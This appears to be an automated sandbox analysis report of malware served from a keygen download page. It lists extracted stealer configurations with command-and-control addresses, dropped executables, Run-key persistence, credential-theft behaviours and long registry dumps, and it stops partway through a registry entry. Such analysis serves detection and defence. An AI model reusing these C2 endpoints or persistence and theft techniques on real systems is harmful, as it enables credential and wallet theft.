Resubmissions
22-04-2021 16:45
210422-k9xv9nxcbx 1021-04-2021 17:01
210421-pl1rqeqs7n 1021-04-2021 12:53
210421-gkr26l4mvs 1020-04-2021 19:55
210420-nex8ep6zhj 1020-04-2021 15:03
210420-v63pp18knj 10Analysis
-
max time kernel
1800s -
max time network
1797s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-04-2021 15:03
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Behavioral task
behavioral1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral2
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win7v20210408
Behavioral task
behavioral3
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral4
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral5
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
Behavioral task
behavioral6
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral7
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
General
-
Target
https://keygenit.com/d/8550ceeb125094q2480.html
-
Sample
210420-v63pp18knj
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
562d987fd49ccf22372ac71a85515b4d288facd7
-
url4cnc
https://telete.in/j90dadarobin
Extracted
fickerstealer
sodaandcoke.top:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/5240-345-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/5240-347-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 136 5240 msiexec.exe 558 5240 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Ultra.exeplayer_record_48792.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe File opened for modification C:\Windows\system32\drivers\etc\hosts player_record_48792.exe -
Executes dropped EXE 51 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-5.exekeygen-step-2.exekeygen-step-3.exekey.exekeygen-step-4.exekey.exeFree.exeNYuI1gZGXFxr8Q.exeJoSetp.exe3440.tmp.exe4081858.exe889190.exeaskinstall20.exeWindows Host.exeInstall.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpXaevavizhyko.exeUltraMediaBurner.exefilee.exe8CEF.tmp.exe8F32.tmp.exe8CEF.tmp.exejg6_6asg.exekabo.exekabo.exeIrecCH6.exeIrecCH6.tmpplayer_record_48792.exeirecord.exeirecord.tmpSorihahyxe.exeRopakomivi.exegcttt.exei-record.exejfiag3g_gg.exejfiag3g_gg.exe5938.exe5BE8.exefbvhagtfbvhagtjfiag3g_gg.exefbvhagtfbvhagtjfiag3g_gg.exefbvhagtfbvhagtpid process 700 keygen-pr.exe 3584 keygen-step-1.exe 3480 keygen-step-5.exe 4020 keygen-step-2.exe 2820 keygen-step-3.exe 2064 key.exe 3528 keygen-step-4.exe 2248 key.exe 1796 Free.exe 1596 NYuI1gZGXFxr8Q.exe 3264 JoSetp.exe 4896 3440.tmp.exe 3164 4081858.exe 4408 889190.exe 4548 askinstall20.exe 4700 Windows Host.exe 4484 Install.exe 4964 Install.tmp 4760 Ultra.exe 2208 ultramediaburner.exe 4888 ultramediaburner.tmp 756 Xaevavizhyko.exe 4404 UltraMediaBurner.exe 5000 filee.exe 4904 8CEF.tmp.exe 4528 8F32.tmp.exe 5296 8CEF.tmp.exe 5492 jg6_6asg.exe 2876 kabo.exe 5596 kabo.exe 5108 IrecCH6.exe 5676 IrecCH6.tmp 5868 player_record_48792.exe 5996 irecord.exe 6016 irecord.tmp 6032 Sorihahyxe.exe 6064 Ropakomivi.exe 6136 gcttt.exe 2596 i-record.exe 5164 jfiag3g_gg.exe 4452 jfiag3g_gg.exe 5504 5938.exe 1568 5BE8.exe 4852 fbvhagt 4160 fbvhagt 5092 jfiag3g_gg.exe 3516 fbvhagt 5488 fbvhagt 676 jfiag3g_gg.exe 2404 fbvhagt 1020 fbvhagt -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Xaevavizhyko.exekeygen-step-4.exeSorihahyxe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Xaevavizhyko.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Sorihahyxe.exe -
Loads dropped DLL 25 IoCs
Processes:
rundll32.exeregsvr32.exeInstall.tmp3440.tmp.exekabo.exeIrecCH6.tmpi-record.exefbvhagtfbvhagtfbvhagtpid process 2368 rundll32.exe 4232 regsvr32.exe 4964 Install.tmp 4896 3440.tmp.exe 4896 3440.tmp.exe 4896 3440.tmp.exe 4896 3440.tmp.exe 4896 3440.tmp.exe 5596 kabo.exe 5676 IrecCH6.tmp 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 2596 i-record.exe 4160 fbvhagt 5488 fbvhagt 1020 fbvhagt -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
8F32.tmp.exeplayer_record_48792.exegcttt.exe889190.exeUltra.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8F32.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe" 8F32.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\Rarugegyli.exe\"" player_record_48792.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 889190.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vaejojymiky.exe\"" Ultra.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg6_6asg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 137 api.ipify.org 179 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\9SMYQZ5A.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\9SMYQZ5A.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 53187E2ACDC507D1 svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
regsvr32.exepid process 4232 regsvr32.exe -
Suspicious use of SetThreadContext 10 IoCs
Processes:
key.exesvchost.exe8F32.tmp.exe8CEF.tmp.exekabo.exefbvhagtfbvhagtfbvhagtdescription pid process target process PID 2064 set thread context of 2248 2064 key.exe key.exe PID 388 set thread context of 4196 388 svchost.exe svchost.exe PID 388 set thread context of 1120 388 svchost.exe svchost.exe PID 4528 set thread context of 5136 4528 8F32.tmp.exe msiexec.exe PID 4528 set thread context of 5240 4528 8F32.tmp.exe msiexec.exe PID 4904 set thread context of 5296 4904 8CEF.tmp.exe 8CEF.tmp.exe PID 2876 set thread context of 5596 2876 kabo.exe kabo.exe PID 4852 set thread context of 4160 4852 fbvhagt fbvhagt PID 3516 set thread context of 5488 3516 fbvhagt fbvhagt PID 2404 set thread context of 1020 2404 fbvhagt fbvhagt -
Drops file in Program Files directory 48 IoCs
Processes:
irecord.tmpFree.exeUltra.exeplayer_record_48792.exeultramediaburner.tmpdescription ioc process File opened for modification C:\Program Files (x86)\recording\avformat-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\avcodec-53.dll irecord.tmp File created C:\Program Files (x86)\recording\is-QGK27.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-PTTFS.tmp irecord.tmp File created C:\Program Files\install.dll Free.exe File created C:\Program Files\VideoLAN\MGXZJJAFXW\ultramediaburner.exe.config Ultra.exe File created C:\Program Files\Uninstall Information\WUGAUHDUPK\irecord.exe.config player_record_48792.exe File opened for modification C:\Program Files (x86)\recording\Bunifu_UI_v1.52.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\avdevice-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Windows Multimedia Platform\Rarugegyli.exe player_record_48792.exe File created C:\Program Files (x86)\recording\is-FEOG8.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-RV758.tmp irecord.tmp File created C:\Program Files (x86)\Windows Multimedia Platform\Rarugegyli.exe.config player_record_48792.exe File created C:\Program Files (x86)\recording\is-5F35C.tmp irecord.tmp File created C:\Program Files (x86)\Windows Portable Devices\Vaejojymiky.exe.config Ultra.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\recording\i-record.exe irecord.tmp File opened for modification C:\Program Files (x86)\recording\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\recording\unins000.dat irecord.tmp File created C:\Program Files (x86)\recording\is-7CBIK.tmp irecord.tmp File opened for modification C:\Program Files (x86)\recording\unins000.dat irecord.tmp File created C:\Program Files (x86)\recording\is-6UQ79.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-TFRL1.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-38PIO.tmp irecord.tmp File created C:\Program Files\verify.dll Free.exe File created C:\Program Files\VideoLAN\MGXZJJAFXW\ultramediaburner.exe Ultra.exe File created C:\Program Files (x86)\UltraMediaBurner\is-HLN2R.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\recording\swscale-2.dll irecord.tmp File created C:\Program Files (x86)\recording\is-GP03C.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-R9NT1.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-8VQ50.tmp irecord.tmp File created C:\Program Files\nio.dll Free.exe File created C:\Program Files\install.dat Free.exe File created C:\Program Files\Uninstall Information\WUGAUHDUPK\irecord.exe player_record_48792.exe File opened for modification C:\Program Files (x86)\recording\avfilter-2.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\unins000.exe irecord.tmp File created C:\Program Files (x86)\recording\is-OUT9O.tmp irecord.tmp File created C:\Program Files\management.dll Free.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-S063U.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\recording\AForge.Video.FFMPEG.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\avutil-51.dll irecord.tmp File created C:\Program Files (x86)\Windows Portable Devices\Vaejojymiky.exe Ultra.exe File opened for modification C:\Program Files (x86)\recording\AForge.Video.dll irecord.tmp File opened for modification C:\Program Files (x86)\recording\swresample-0.dll irecord.tmp File created C:\Program Files (x86)\recording\is-7OT3T.tmp irecord.tmp File created C:\Program Files (x86)\recording\is-LORF9.tmp irecord.tmp -
Drops file in Windows directory 2 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
kabo.exefbvhagtfbvhagtfbvhagtdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fbvhagt -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exe8CEF.tmp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8CEF.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8CEF.tmp.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4296 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4484 taskkill.exe 2376 taskkill.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 339704ea112ed701 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEMicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exebrowser_broker.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30881270" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ad98e1c4c5c1f64cbad3c833b8884b27000000000200000000001066000000010000200000004b3ab640ddc7ab4a33e05bdddda8663c348a15c26a23fc2e916a6ffafc657649000000000e8000000002000020000000e2fa60739b48182309be1f4d925dc3bf25089aa11779271b3aa674094e4c85992000000088105b1b9435b47aeef75e00eca73739ef1fd18f556a3438fa069b62d748bcca4000000039a97fc398d60d0703a285bd3af79419b29d2083ad1ccb7dfa0f2ae4108038fde05b1b24e7a0743775a26a9176a2782e3550505d3a4d30707932707fbdf9c083 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "325744794" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "325696208" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 703d42ecf635d701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "325712802" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3948773676" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3926272329" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3926272329" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50244eecf635d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30881270" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ad98e1c4c5c1f64cbad3c833b8884b27000000000200000000001066000000010000200000006243f5329170b72b97d4034dda4306c54558a1d4a90279123f174eec96dfe98c000000000e8000000002000020000000ef2040fabda69959327f2eccc5b0a75d93cc7ad2728658e63956925a156ef0fb2000000033d351e8acf33f0469687242959c61bf186a8c7fbe14137951bf69133ddb56c54000000070f3f4186ba2ae25ecb385ff5a9ef73a8e1ebb570d34a6ee45a162b9b3ba78274b8d9bd8c33715a91cf892be12bbf0e190596ac749399689891f41c2a11600da iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{157432FB-A1EA-11EB-A11C-56F1F4F21F1A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{668C164F-72C5-4EE4-A0CF-32627E2B6F55}" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30881270" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
svchost.exesvchost.exefilee.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc filee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe -
Modifies registry class 64 IoCs
Processes:
Free.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\ProgID\ = "Unicode.Application" Free.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (str) 